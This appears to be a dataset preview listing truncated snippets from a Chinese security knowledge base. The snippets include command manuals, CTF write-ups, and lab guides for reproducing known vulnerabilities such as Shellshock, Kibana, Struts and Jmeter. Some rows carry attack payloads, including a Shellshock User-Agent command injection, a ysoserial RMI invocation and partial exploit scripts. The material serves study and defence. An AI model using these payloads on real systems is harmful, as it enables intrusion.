text
stringlengths
100
9.93M
category
stringclasses
11 values
xrandr === X 窗口系统配置管理工具 ## 补充说明 **xrandr命令**RandR(Rotate and Resize,旋转与缩放)是一个X窗口系统扩展,允许客户端动态调整(即缩放、旋转、翻转)屏幕。xrandr是一款官方的randr扩展配置工具。 ### 语法 ```shell xrandr(选项)(参数) ``` ### 选项 ```shell --auto #以系统最大分辨率输出 --off #指定设备设置为关闭 --output #输出设备 --mode #设置分辨率 --rate #设置刷新率 --right-of #主显示器右侧 --left-of #...
sec-knowleage
# 实用性 WEB 开发人员安全须知 ### 目标读者 安全问题主要由以下两类原因导致: 1. 那些刚入门的无法区分 MD5 和 bcrypt 作用的开发者 2. 那些知道这件事但忘记/忽略了的开发者 我们的详细说明应该可以帮到第 1 类开发者,而我们希望我们的 checklist 可以帮到第 2 类的开发者构建更多的安全系统。这并不是一个综合性的全面指南,只是覆盖了大多数我们在过去发现的常见问题。 ### 目录 1. [安全Checklist](security-checklist-zh.md) 2. 什么东西会出问题? 3. 安全地传输数据: HTTPS 详解 4. 权限验证: 我是谁?...
sec-knowleage
# Kibana 原型链污染导致任意代码执行漏洞 (CVE-2019-7609) Kibana 为 Elassticsearch 设计的一款开源的视图工具。其5.6.15和6.6.1之前的版本中存在一处原型链污染漏洞,利用这个漏洞我们可以在目标服务器上执行任意JavaScript代码。 参考链接: - https://nvd.nist.gov/vuln/detail/CVE-2019-7609 - https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/ - https://slides.com/securitymb/prototy...
sec-knowleage
# 最后一次异常法 最后一次异常法的原理是, 程序在自解压或自解密过程中, 可能会触发无数次的异常. 如果能定位到最后一次程序异常的位置, 可能就会很接近自动脱壳完成位置. 现在最后一次异常法脱壳可以利用Ollydbg的异常计数器插件, 先记录异常数目, 然后重新载入, 自动停在最后一次异常处. ## 要点 1. 点击`选项->调试选项—>异常`, 把里面的√全部去掉! 按下`CTRL+F2`重载下程序 2. 开始程序就是一个跳转, 在这里我们按`SHIFT+F9`, 直到程序运行, 记下从开始按`SHIFT+F9`到程序运行的次数`m`! 3. `CTRL+F2`重载程序, 按`SHIFT+F9`(这次按的次数为程序运行的次数`m...
sec-knowleage
# 研究方向与相关研究者 ## 目录 [TOC] ## 研究方向与项目 整理一些安全数据分析、AI驱动安全相关的研究方向与项目。 ### 研究方向 以下来自[郑涵](https://zhuanlan.zhihu.com/p/88042567)师傅的文章: - 通过LSTM自动生成webshell黑样本 - 基于GAN网络绕过现有深度学习AV检测模型 - 基于遗传优化算法的的自动化0day样本生成 - 基于贝叶斯信念网络的入侵回溯推理 - 通过攻击链路中已回溯出来的信息(进程、网络、文件)横向关联其他被这个团伙入侵的机器,然后继承他们的入侵原因 --- 以下来自[404](https://github.com/40...
sec-knowleage
#include <stdio.h> #include <stdlib.h> #include <string.h> /*** HELPER FUNCTIONS ***/ const int N = 1024; // General buffer size int get_number() { int k; char buffer[N]; if (fgets (buffer, N, stdin) == NULL) { printf("Failed to read number\n"); exit(-69); } sscanf(buffer, "%d\n...
sec-knowleage
# Gh0st in the machine (forensic,60p) > mY CoMputEr IS ActIng uP. cAn yOu heLP mE? > Flag format: BITS(WORDS.IN.CAPS) In this task we were given a pcap containing two minutes worth of keyboard USB capture. Apart from the actual keystrokes (which turned out to spell link to Rick Roll video...), there were some packets g...
sec-knowleage
get_module === 获取Linux内核模块的详细信息 ## 补充说明 **get_module命令** 用于获取Linux内核模块的详细信息。 ### 语法 ```shell get_module 模块名 ``` ### 实例 使用lsmod命令查看内核模块: ```shell lsmod | head -5 Module Size Used by ipv6 272801 15 xfrm_nalgo 13381 1 ipv6 crypto_api 12609 1 xfrm_nalgo ip_con...
sec-knowleage
# 0x00 Listeners介绍 在本版本Cobalt Strike 3.12中 提供了如图 8种Listeners(监听器) ![Cobalt Strike ](./img/2.1.png) >windows/beacon_dns/reverse_dns_txt windows/beacon_dns/reverse_http windows/beacon_http/reverse_http windows/beacon_https/reverse_https windows/beacon_smb/bind_pipe windows/foreign/reverse_http windows/foreign/reverse_htt...
sec-knowleage
# 代理实验 > 注 : 笔记中拓扑图 xmind 源文件在其图片目录下 --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- **相关文章** - [终于有人把正向代理和反向代理解释的明明白白了!](https://cloud.tencent.com/developer/article/1418457) - [谈谈我所了解的WEB代理](https://www.freebuf.com/articles/web/181723.html) - [红队第9篇:给任意java程序挂Socks5代理方法](https://mp.weixin.qq.com/s...
sec-knowleage
bc === 算术操作精密运算工具 ## 补充说明 **bc命令** 是一种支持任意精度的交互执行的计算器语言。bash内置了对整数四则运算的支持,但是并不支持浮点运算,而bc命令可以很方便的进行浮点运算,当然整数运算也不再话下。 ### 语法 ```shell bc(选项)(参数) ``` ### 选项 ```shell -i:强制进入交互式模式; -l:定义使用的标准数学库; -w:对POSIX bc的扩展给出警告信息; -q:不打印正常的GNU bc环境信息; -v:显示指令版本信息; -h:显示指令的帮助信息。 ``` ### 参数 文件:指定包含计算任务的文件。 ### 实例 算术操作高级运算bc命令它可以执行浮点...
sec-knowleage
# Bash Shellshock 破壳漏洞(CVE-2014-6271) 编译运行: ``` docker compose up -d ``` 服务启动后,有两个页面`http://your-ip:8080/victim.cgi`和`http://your-ip:8080/safe.cgi`。其中safe.cgi是最新版bash生成的页面,victim.cgi是bash4.3生成的页面。 将payload附在User-Agent中访问victim.cgi: ``` User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /usr/bin/id ``` ...
sec-knowleage
# Atlassian Jira 模板注入漏洞(CVE-2019-11581) Atlassian Jira是企业广泛使用的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。 多个版本前存在利用模板注入执行任意命令: - 4.4.x - 5.x.x - 6.x.x - 7.0.x - 7.1.x - 7.2.x - 7.3.x - 7.4.x - 7.5.x - 7.6.x before 7.6.14 (the fixed version for 7.6.x) - 7.7.x - 7.8.x - 7.9.x - 7.10.x - 7.11.x - 7.12.x - 7...
sec-knowleage
'\" The definitions below are for supplemental macros used in Tcl/Tk '\" manual entries. '\" '\" .AP type name in/out ?indent? '\" Start paragraph describing an argument to a library procedure. '\" type is type of argument (int, etc.), in/out is either "in", "out", '\" or "in/out" to describe whether procedure reads or...
sec-knowleage
# 威胁情报数据源·整合 本篇整理公开的威胁情报数据源,但公开不等于无版权,注意哦~ ## IOC Repositories > These repo’s contain threat intelligence generally updated manually when the respective orgs publish threat reports.[2] - https://github.com/aptnotes/data - https://github.com/citizenlab/malware-indicators - https://github.com/da667/667s_Shitlist ...
sec-knowleage
# DoSaTTaCK * Category: Reverse Engineering * 1200 Points * Solved by the JCTF Team ## Description > What is this file and how can it help you get the flag? Attached was a file called `challenge.flp`. ## Solution Let's inspect this file: ```console root@kali:/media/sf_CTFs/bsidestlv/DoSaTTaCK# file challenge.flp chall...
sec-knowleage
# H1 Thermostat ## [Flag0](./flag0) -- Found - Communication is key - Have you looked at what the app is sending to the server? ## [Flag1](./flag1) -- Found - Doesn't the MAC seem interesting? - Access to the source code would help - Check out the [Android Quickstart][1] video from Hacker101 [1]: https://www.hacker101....
sec-knowleage
# PAM --- ## 关于PAM PAM 基础知识见 [认证](../笔记/认证.md#pam) **安装 PAM** CentOS、Fedora、EulerOS 系统默认安装了 PAM 并默认启动。 ```bash apt-get install libpam-cracklib ``` **判断程序是否使用了 PAM** ``` ldd /usr/bin/passwd | grep libpam ``` **PAM 身份验证配置文件** `/etc/pam.d/` 目录包含应用程序的 PAM 配置文件。例如,login 程序将其程序/服务名称定义为 login,与之对应的 PAM 配置文件为 `/etc/pam.d/login...
sec-knowleage
# VUE Vue.js(读音 /vjuː/, 类似于 view)是一个构建数据驱动的 web 界面的渐进式框架。 Vue.js 的目标是通过尽可能简单的 API 实现响应的数据绑定和组合的视图组件 ### 简介 Vue 是一套构建用户界面的渐进式框架 Vue 只关注视图层,采用自底向上增量开发的设计 Vue 的目标是通过尽可能简单的 API 实现响应的数据绑定和组合的视图组件 Vue 学习起来非常简单,对于新手非常友好,而且有丰富的中文文档,非常容易上手 ### VUE 作者 Vue.js的作者为Evan You(尤雨溪)。 尤雨溪在国内读完初中,才去美国完成大学学业,所以说这是一个比较中国的中国人。看看尤雨溪对于 VUE 的看法...
sec-knowleage
## Hacking Time (re, 200p, 180 solves) ### PL [ENG](#eng-version) > We’re getting a transmission from someone in the past, find out what he wants. > [HackingTime.nes](HackingTime.nes) Pobieramy udostępniony plik, który okazuje się obrazem aplikacji na Nintendo Entertainment System, 8-bitową konsolę, którą każdy zna i...
sec-knowleage
# Jetty Ambiguous Paths Information Disclosure Vulnerability (CVE-2021-34429) [中文版本(Chinese version)](README.zh-cn.md) Eclipse Jetty is a Java web server and Java Servlet container. Jetty 9.4.40 fixed an ambiguous paths information disclosure vulnerability [CVE-2021-28164](https://github.com/vulhub/vulhub/tree/maste...
sec-knowleage
# Jmeter RMI 反序列化命令执行漏洞(CVE-2018-1297) Apache JMeter是美国阿帕奇(Apache)软件基金会的一套使用Java语言编写的用于压力测试和性能测试的开源软件。其2.x版本和3.x版本中存在反序列化漏洞,攻击者可以利用该漏洞在目标服务器上执行任意命令。 ## 漏洞环境 运行漏洞环境: ``` docker compose up -d ``` 运行完成后,将启动一个RMI服务并监听1099端口。 ## 漏洞复现 直接使用ysoserial即可进行利用: ``` java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploi...
sec-knowleage
set === 显示或设置shell特性及shell变量 ## 补充说明 **set命令** 作用主要是显示系统中已经存在的shell变量,以及设置shell变量的新变量值。使用set更改shell特性时,符号"+"和"-"的作用分别是打开和关闭指定的模式。set命令不能够定义新的shell变量。如果要定义新的变量,可以使用declare命令以`变量名=值`的格式进行定义即可。 ### 语法 ```shell set(选项)(参数) ``` ### 选项 ```shell -a:标示已修改的变量,以供输出至环境变量。 -b:使被中止的后台程序立刻回报执行状态。 -C:转向所产生的文件无法覆盖已存在的文件。 -d:Shell预设会...
sec-knowleage
# Crypto (crypto, 136p, 12 solved) In the challenge we get an [encryption code](enc.py) and encrypted flag `a22d0fb9f707b153ab68472082d1f3e977a23f3dc0de469388ec3a56131943eba1873071f7fc01b5fc31b5335056286f5d7634735f35776a74` One we analyse the code we can clearly see the vulnerability -> there are 2 things which are sup...
sec-knowleage
# WiFikiller > 文章作者 [Sarah-Briggs](https://github.com/Sarah-Briggs) & [Atomic-Crash](https://github.com/Atomic-Crash) & [r0fus0d](https://github.com/No-Github) --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- ## 简介 考虑到过往比赛的场景中,有部分参赛者使用手机热点共享给笔记本,从而上网查阅资料破坏比赛的公平性,这次考虑制作一个 WiFikiller。它的功能有攻击 wifi,这可以致...
sec-knowleage
# Ocean of sockets (forensics, 200p) In the task we get a binary which I think was packed with UPX, but with renamed sections. Once you fix those, you can unpack it via UPX and get [binary](OceanOfSockets.exe). This is actually pyinstaller executable, so we can unpack this using https://github.com/countercept/python-ex...
sec-knowleage
# Secure-Win <p align="center"> <img src="../../../assets/img/banner/Secure-Win.jpg" width="90%"> </p> - `windows 加固+维护+应急响应参考` --- ## 大纲 * **[文件](#文件)** * [可疑文件](#可疑文件) * **[系统](#系统)** * [开机启动](#开机启动) * [账号](#账号) * [进程](#进程) * [注册表](#注册表) * [日志](#日志) * [系统日志](#系统日志) * [日志工具]...
sec-knowleage
# PNG <p align="center"> <img src="../../../../assets/img/banner/png.jpg" width="70%"></a> </p> > 注 : 笔记中拓扑图 xmind 源文件在其图片目录下 --- ## 什么是PNG PNG 是 20 世纪 90 年代中期开始开发的图像文件存储格式,其目的是替代 GIF 和 TIFF 文件格式,同时增加一些 GIF 文件格式所不具备的特性。流式网络图形格式 (Portable Network Graphic Format,PNG) 名称来源于非官方的 “PNG's Not GIF”,是一种位图文件(bitmap file) 存储格...
sec-knowleage
# House of Roman ## 介绍 House of Roman 这个技巧说简单点其实就是 fastbin attack 和 Unsortbin attack 结合的一个小 trick。 ## 概括 该技术用于 bypass ALSR,利用12-bit 的爆破来达到获取shell的目的。且仅仅只需要一个 UAF 漏洞以及能创建任意大小的 chunk 的情况下就能完成利用。 ## 原理以及展示 作者提供给了我们一个 demo 用于展示,整个利用过程大概可以分为三步骤。 1. 将 FD 指向 malloc_hook 2. 修正 0x71 的 Freelist 3. 往 malloc_hook 写入 one gadget 先对 ...
sec-knowleage
#!/usr/bin/env python3 import zlib import json import random import requests import string import sys from urllib3.exceptions import InsecureRequestWarning # Suppress only the single warning from urllib3 needed. requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) eval_config = { "Counsume...
sec-knowleage
# MVC --- ## 什么是 MVC 框架 假设我们已经编写了几个JavaBean: ```java public class User { public long id; public String name; public School school; } public class School { public String name; public String address; } ``` 在 `UserServlet` 中,我们可以从数据库读取 User、School 等信息,然后,把读取到的 JavaBean 先放到 `HttpServletRequest` 中,再通过 `f...
sec-knowleage
# eleCTRic Cryptography, 400 points ## Description: > You came across a custom server that Dr Xernon's company eleCTRic Ltd uses. It seems to be storing some encrypted files. Can you get us the flag? ```python #!/usr/bin/python from Crypto import Random from Crypto.Cipher import AES import sys import time import binasc...
sec-knowleage
import r2pipe, sys r2=r2pipe.open("iof.elf") s=r2.cmd("p8 4 @ "+sys.argv[1]) s=s[6:8]+s[4:6]+s[2:4]+s[0:2] print s print r2.cmd("xr 4 @ "+sys.argv[1]+"") r=open("esp32.rom").readlines() for l in r: if s in l: print l
sec-knowleage
# Unicorn Engine简介 ## 什么是Unicorn引擎 Unicorn是一个轻量级, 多平台, 多架构的CPU模拟器框架. 我们可以更好地关注CPU操作, 忽略机器设备的差异. 想象一下, 我们可以将其应用于这些情景: 比如我们单纯只是需要模拟代码的执行而非需要一个真的CPU去完成那些操作, 又或者想要更安全地分析恶意代码, 检测病毒特征, 或者想要在逆向过程中验证某些代码的含义. 使用CPU模拟器可以很好地帮助我们提供便捷. 它的亮点(这也归功于Unicorn是基于[qemu](http://www.qemu.org)而开发的)有: * 支持多种架构: Arm, Arm64 (Armv8), M68K, Mips, ...
sec-knowleage
# T1210-win-检测到匿名计算机账户更改的使用 ## 来自ATT&CK的描述 攻击者一旦进入网络,便可能利用远程服务获得对内部系统的未授权访问。当攻击者利用程序,服务或操作系统软件或内核本身内的编程错误来执行攻击者控制的代码时,就会利用软件漏洞。建立立足点后利用远程服务的目标是横向移动以实现对远程系统的访问。 攻击者可能需要确定远程系统是否处于易受攻击状态,这可以通过网络服务扫描或其他发现方法来完成,以寻找在网络中部署的常见易受攻击软件,检测或包含远程利用的漏洞或安全软件。服务器可能是横向移动中的高价值目标,但是如果端点系统提供访问其他资源的方式,则端点系统也可能处于危险之中。 常见服务(例如SMB和RDP)以及可能在内部网...
sec-knowleage
# Extremely Covert Bytes Category: Cryptography ## Description > DuckyDebugDuck is taking Computer Security this semester and he decided to create this encryption service using an encryption he seen in class, and again he hid a flag in it, see if you can get it. ## Solution Let's connect to the attached service: ```con...
sec-knowleage
.\" Copyright 1998 Andries E. Brouwer (aeb@cwi.nl) .\" .\" May be distributed under the GNU General Public License .\" Rewritten for 2.1.117, aeb, 981010. .\" .TH MKSWAP 8 "25 March 1999" "Linux 2.2.4" "Linux Programmer's Manual" .SH NAME mkswap \- 建立一个linux交换区 .SH 总览 .BI "mkswap [\-c] [\-v" N "] [\-f] " device " [" s...
sec-knowleage
/* * Copyright 2015-2017 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by ap...
sec-knowleage
### pyc文件的code object介绍 > 在我们导入 python 脚本时在目录下会生成个一个相应的 pyc 文件,是pythoncodeobj的持久化储存形式,加速下一次的装载。 ### pyc文件的文件结构 pyc文件由三大部分组成 - 最开始4个字节是一个Maigc int, 标识此pyc的版本信息 - 接下来四个字节还是个int,是pyc产生的时间 - 序列化的 PyCodeObject,结构参照[include/code.h](https://github.com/python/cpython/blob/master/Include/code.h),序列化方法[python/marshal](https://gi...
sec-knowleage
# HID-KeyboardLogger > 文章作者 [Sarah-Briggs](https://github.com/Sarah-Briggs) & [Atomic-Crash](https://github.com/Atomic-Crash) & [r0fus0d](https://github.com/No-Github) <p align="center"> <img src="../../../../../assets/img/banner/HID-KeyboardLogger.jpg"> </p> --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响...
sec-knowleage
vi === 功能强大的纯文本编辑器 ## 补充说明 **vi命令** 是UNIX操作系统和类UNIX操作系统中最通用的全屏幕纯文本编辑器。Linux中的vi编辑器叫vim,它是vi的增强版(vi Improved),与vi编辑器完全兼容,而且实现了很多增强功能。 vi编辑器支持编辑模式和命令模式,编辑模式下可以完成文本的编辑功能,命令模式下可以完成对文件的操作命令,要正确使用vi编辑器就必须熟练掌握着两种模式的切换。默认情况下,打开vi编辑器后自动进入命令模式。从编辑模式切换到命令模式使用“esc”键,从命令模式切换到编辑模式使用“A”、“a”、“O”、“o”、“I”、“i”键。 vi编辑器提供了丰富的内置命令,有些内置命令使用键...
sec-knowleage
from flask import Flask, abort, redirect, request, Response import base64, json, MySQLdb, os, re, subprocess app = Flask(__name__) home = ''' <title>Magical Image Gallery</title> <h1>Magical Image Gallery</h1> $ALBUMS$ ''' viewAlbum = ''' <title>$TITLE$ -- Magical Image Gallery</title> <h1>$TITLE$</h1> $GALLERY$ ''...
sec-knowleage
# ACL --- ## 什么是 ACL windows 系统中的 ACL(Access Control List),用来表示组与用户权限的列表。比如文件、注册表的权限都包括 ACL,它用来表示哪些组与用户具有操作权限,其实主要是一组规则,定义哪些组与用户等对特定 AD 对象具有哪些权限。 **ACL** Access Control List,用来表示用户(组)权限的列表,包括 DACL 和 SACL; **ACE** Access Control Entry,ACL 中的元素; **DACL** Discretionary Access Control List,用来表示安全对象权限的列表; **SACL** System Ac...
sec-knowleage
.\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\"******************************************************************* .\" .\" This file was generated with po4a. Translate the source file. .\" .\"******************************************************************* .TH HOSTID 1 2022年9月 "GNU coreutils 9...
sec-knowleage
## Illuminati (Web, 200p) ###ENG [PL](#pl-version) In the task we get access to a Illuminati recruitment webpage. However the recruitment is closed and we can only send messages to the admin and he might accept us. We could see only our own messages. Our first assumption was that it's some standard XSS attack on the ad...
sec-knowleage
## Sandbox (pwn, 5p) Escape from this broken sandbox notice: You have to solve the warmup task first. And try to get the flag at /home/sandbox/flag We were given small [Linux binary](sandbox): ``` sandbox: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so....
sec-knowleage
'\" '\" Copyright (c) 1993 The Regents of the University of California. '\" Copyright (c) 1994-1997 Sun Microsystems, Inc. '\" '\" See the file "license.terms" for information on usage and redistribution '\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\" '\" RCS: @(#) $Id: tclvars.n,v 1.2 2003/11/24 05:10:0...
sec-knowleage
# S2-032 远程代码执行漏洞(CVE-2016-3081) 影响版本: Struts 2.3.20 - Struts Struts 2.3.28 (except 2.3.20.3 and 2.3.24.3) 漏洞详情: - https://cwiki.apache.org/confluence/display/WW/S2-032 - https://www.cnblogs.com/mrchang/p/6501428.html ## 漏洞环境 执行如下命令启动struts2 2.3.28: ``` docker compose up -d ``` 环境启动后,访问`http://your-ip:8080`即可看...
sec-knowleage
# T1006-win-直接访问卷 ## 来自ATT&CK的描述 攻击者可以直接访问一个卷,以绕过文件访问控制和文件系统监控。Windows允许程序直接访问逻辑卷。拥有直接访问权的程序可以通过分析文件系统的数据结构直接从驱动器中读写文件。这种技术可以绕过Windows文件访问控制以及文件系统监控工具。 诸如NinjaCopy这样的实用程序,可以在PowerShell中执行这些操作。 ## 测试案例 通过DOS命令(PowerShell)读取卷引导扇区 此测试使用PowerShell通过DOS命令,并对卷的前几个字节执行直接访问读取。成功时,将显示卷的前11个字节的十六进制转储。 对于NTFS卷,它应符合以下顺序(NTFS分区引导扇...
sec-knowleage
**Authors**: < [nixawk](https://github.com/nixawk) > ---- # Cisco ASA - CVE-2016-6366 > A vulnerability in the Simple Network Management Protocol (SNMP) code of Cisco Adaptive Security Appliance (ASA) Software could allow an authenticated, remote attacker to cause a reload of the affected system or to remotely execute ...
sec-knowleage
# Hacker101 CTF ## 0x00 Overview [Hacker101 CTF][1] is part of HackerOne free online training program. Really a good place to apply all the pen test skills for beginners. ## 0x01 CTF | Difficulty | Name | Skills | Completion | | ---------- | ---------------------------...
sec-knowleage
#!/usr/bin/python3 from pwn import * def exploit(connection): def recv_request(): request_id = u64(connection.recvn(8)) data = connection.recvn(0x20) return request_id, data def send_response(request_id, data): connection.send(p64(request_id)) if len(data) != 0x20: ...
sec-knowleage
## 工厂方法(Factory Method) ### Intent 定义了一个创建对象的接口,但由子类决定要实例化哪个类。工厂方法把实例化操作推迟到子类。 ### Class Diagram 在简单工厂中,创建对象的是另一个类,而在工厂方法中,是由子类来创建对象。 下图中,Factory 有一个 doSomething() 方法,这个方法需要用到一个产品对象,这个产品对象由 factoryMethod() 方法创建。该方法是抽象的,需要由子类去实现。 <div align="center"> <img src="https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/f4...
sec-knowleage
# Securinets CTF Quals 2018 Team: shalom, akrasuski1, psrok1, nazywam, sasza ### Table of contents * [The worst RSA joke (crypto)](crypto_worst_rsa) * [Looser (crypto)](crypto_looser) * [Improve the quality (crypto)](crypto_quality) * [Notice me (forensics)](for_notice) * [Magic test (web)](web_magic) * [Special (pwn)]...
sec-knowleage
# Mimikatz <p align="center"> <img src="../../../assets/img/logo/mimikatz.jpg" width="25%"> </p> --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- **项目地址** - https://github.com/gentilkiwi/mimikatz **文章 & Reference** - [九种姿势运行 Mimikatz](https://www.freebuf.com/articles/web/176796.html) - [Mimikatz...
sec-knowleage
read === 从键盘读取变量值 ## 补充说明 **read命令** 从键盘读取变量的值,通常用在shell脚本中与用户进行交互的场合。该命令可以一次读取多个变量的值,变量和输入的值都需要使用空格隔开。在read命令后面,如果没有指定变量名,读取的数据将被自动赋值给特定的变量REPLY ### 语法 ```shell read(选项)(参数) ``` ### 选项 ```shell -p:指定读取值时的提示符; -t:指定读取值时等待的时间(秒)。 ``` ### 参数 变量:指定读取值的变量名。 ### 实例 下面的列表给出了read命令的常用方式: ```shell read 1987name 从标准输入读取输入并赋...
sec-knowleage
--- title: masscan categories: Information Gathering tags: [masscan,portscanning,information gathering,kali linux,recon] date: 2017-04-23 11:03:41 --- 0x00 介绍 ------- 视频介绍:[https://asciinema.org/a/31820][1] masscan目前是最快的互联网端口扫描器,最快可以在六分钟内扫遍互联网。 masscan的扫描结果类似于nmap(一个很著名的端口扫描器),在内部,它更像scanrand, unicornscan, and ZMap,采用了...
sec-knowleage
# Insecure Direct Object Reference (IDOR) ## Introduction IDOR stands for Insecure Direct Object Reference is a security vulnerability in which a user is able to access and make changes to data of any other user present in the system. ## Where to find - Usually it can be found in APIs. - Check the HTTP request that con...
sec-knowleage
.\" Automatically generated by Pod::Man v1.37, Pod::Parser v1.14 .\" .\" Standard preamble: .\" ======================================================================== .de Sh \" Subsection heading .br .if t .Sp .ne 5 .PP \fB\\$1\fR .PP .. .de Sp \" Vertical space (when we can't use .PP) .if t .sp .5v .if n .sp .. .de ...
sec-knowleage
--- title: Docker 使用笔记 --- <center><h1>Docker 使用笔记</h1></center> --- ## 0x00 前言 平时在使用 Docker 时,经常会碰到忘记相关命令的情况,因此平时忘记一个就会记录一个,经过多年的记录,Docker 相关的笔记已经记录了不少。 最近在看代码审计的时候又提到了 Docker,正好借着这个机会好好的把原来记录的比较乱的 Docker 笔记整理一下。 如果你也面临过「在使用 Docker 时,时不时就会忘记某条命令」的情况,那么我相信本篇文章应该会对你有所帮助。 ## 0x01 安装 ### 1、安装 Docker ``` curl -fsSL https:/...
sec-knowleage
--- title: CSS 3 date: 2020-12-25 20:22:47 background: bg-[#3473b5] tags: - web - css - style categories: - Programming intro: | This is a quick reference cheat sheet for CSS goodness, listing selector syntax, properties, units and other useful bits of information. plugins: - copyCode --- Gettin...
sec-knowleage
nisdomainname === 显示主机NIS的域名 ## 补充说明 **nisdomainname命令** 用于显示主机NIS的域名。 ### 语法 ```shell nisdomainname(选项) ``` ### 选项 ```shell -v:详细信息模式。 ```
sec-knowleage
# PE --- PE 与 ELF 文件基本相同,也是采用了基于段的格式,同时 PE 也允许程序员将变量或者函数放在自定义的段中, GCC 中 attribute(section('name')) 扩展属性。 PE 文件的前身是 COFF,所以分析 PE 文件,先来看看 COFF 的文件格式,他保存在 WinNT.h 文件中。 COFF 的文件格式和 ELF 几乎一样 | Image Header | |-------------------------------------| | SectionTable Image\_SECTION\_HEADER | | \.text ...
sec-knowleage
import numpy as np from PIL import Image import sys import math import glob import scipy.misc import pytesseract import subprocess import matplotlib.pyplot as plt import random def captcha(image): letters = "ABCDEF1234567890" let = {} for l in letters: f = Image.open("charset/%c.png" % l).convert...
sec-knowleage
# Python安全 --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- ## 代码混淆 - [Hnfull/Intensio-Obfuscator: Obfuscate a python code 2.x and 3.x](https://github.com/Hnfull/Intensio-Obfuscator) --- ## 编译成二进制 - Pyinstaller - py2exe - [Nuitka/Nuitka](https://github.com/Nuitka/Nuitka) --- ## 隐藏 Traceback 信息 Pytho...
sec-knowleage
# Simon and Speck Block Ciphers 这是一组姐妹轻量级加密。 ## Simon Block Cipher ### 基本介绍 Simon 块加密算法由 NSA 2013 年 6 月公布,主要在**硬件实现**上进行了优化。 Simon Block Cipher 是平衡的 [Feistel cipher](https://en.wikipedia.org/wiki/Feistel_cipher) 加密,一共有两块,若每块加密的大小为 n bits,那么明文的大小就是 2n bits。此外,一般来说,该加密中所使用的密钥长度是块长度的整数倍,比如 2n,4n等。常见的 Simon 加密算法有 一般来说,Simo...
sec-knowleage
思科集群检索工具。 [cisco-ocs主页](http://www.blackangels.it/) | [Kali cisco-ocs仓库](http://git.kali.org/gitweb/?p=packages/cisco-ocs.git;a=summary) Author: OverIP License: GPLv2 包括在cisco-ocs中的工具 cisco-ocs – 思科集群检索工具 root@kali:~# cisco-ocs ********************************* OCS v 0.2 ********************************** **** ...
sec-knowleage
diff3 === 比较3个文件不同的地方 ## 补充说明 **diff3命令** 用于比较3个文件,将3个文件的不同的地方显示到标准输出。 ### 语法 ```shell diff3(选项)(参数) ``` ### 选项 ```shell -a:把所有的文件都当做文本文件按照行为单位进行比较,即给定的文件不是文本文件; -A:合并第2个文件和第3个文件之间的不同到第1个文件中,有冲突内容用括号括起来; -B:与选项“-A”功能相同,但是不显示冲突的内容; -e/--ed:生成一个“-ed”脚本,用于将第2个文件和第3个文件之间的不同合并到第1个文件中; --easy-only:除了不显示互相重叠的变化,与选项“-e”的功能相同...
sec-knowleage
# hopytal Do you like guessing? Love, even? Oh boy, do I have a challenge for you. > This random secret key generator is used to sign covid certificates issued from the Hopytal laboratory. > > Its behavior seems strange.. the alphabet must be printable. > > Valid 2G+ certificates may be present on the server. > > Dir...
sec-knowleage
## XOR Crypter (crypto 200p) Description: The state of art on encryption, can you defeat it? CjBPewYGc2gdD3RpMRNfdDcQX3UGGmhpBxZhYhFlfQA= ### PL [ENG](#eng-version) Cały kod szyfrujący jest [tutaj](shiftcrypt.py). Szyfrowanie jest bardzo proste, aż dziwne że zadanie było za 200 punktów. Szyfrowanie polega na podzie...
sec-knowleage
.TH SMBTAR 1 "11 Nov 1999" "smbtar 2.0.6" .PP .SH NAME smbtar \ - 直接备份SMB/CIFS共享资源到UNIX磁带设备的shell脚本 .PP .SH 总览 .PP \fBsmbtar\fP -s server [-p password] [-x service] [-X] [-d directory] [-u user] [-t tape] [-b blocksize] [-N filename] [-i] [-r] [-l log level] [-v] filenames .PP .SH 描述 .PP 此程序是samba套件的一部分。 .PP smbtar是...
sec-knowleage
# so 介绍 ## 基本介绍 - 为什么会用到 Shared Object(SO) - 开发效率 - 快速移植 - so 的版本 - 根据 CPU 平台有所不一样 ## 加载方法 - System.loadLibrary - 如果加载的文件名是 xxx ,那么其实加载的是项目中 libs 目录下的 libxxx.so文件。 - System.load - 对应 lib 的绝对路径。 主要使用第一种方式,第二种方式主要用于在插件中加载 so 文件。 ## loadLibrary 加载流程 根据官方 API 介绍 > The call `System.loadLibrary(name)` is...
sec-knowleage
eject === 用来退出抽取式设备 ## 补充说明 **eject命令** 用来退出抽取式设备。若设备已挂入,则eject命令会先将该设备卸除再退出。 eject允许可移动介质(典型是cd-ROM、软盘、磁带、或者JAZ以及zip磁盘)在软件控制下弹出。该命令也可以控制一些多盘片CD-ROM控制器,控制一些设备支持的自动弹出功能,以及控制一些CD-ROM驱动器磁盘托盘的关闭。与name相应的设备将被弹出,name可以为设备文件或者其挂载点,也可以为完整路径或者省略前面的/dev或者/mnt设备文件名。如果没有指定name,缺省使用cdrom。 有四种不同的弹出的方法,具体要看设备是CD-ROM, SCSI设备,可移动软盘,还是磁...
sec-knowleage
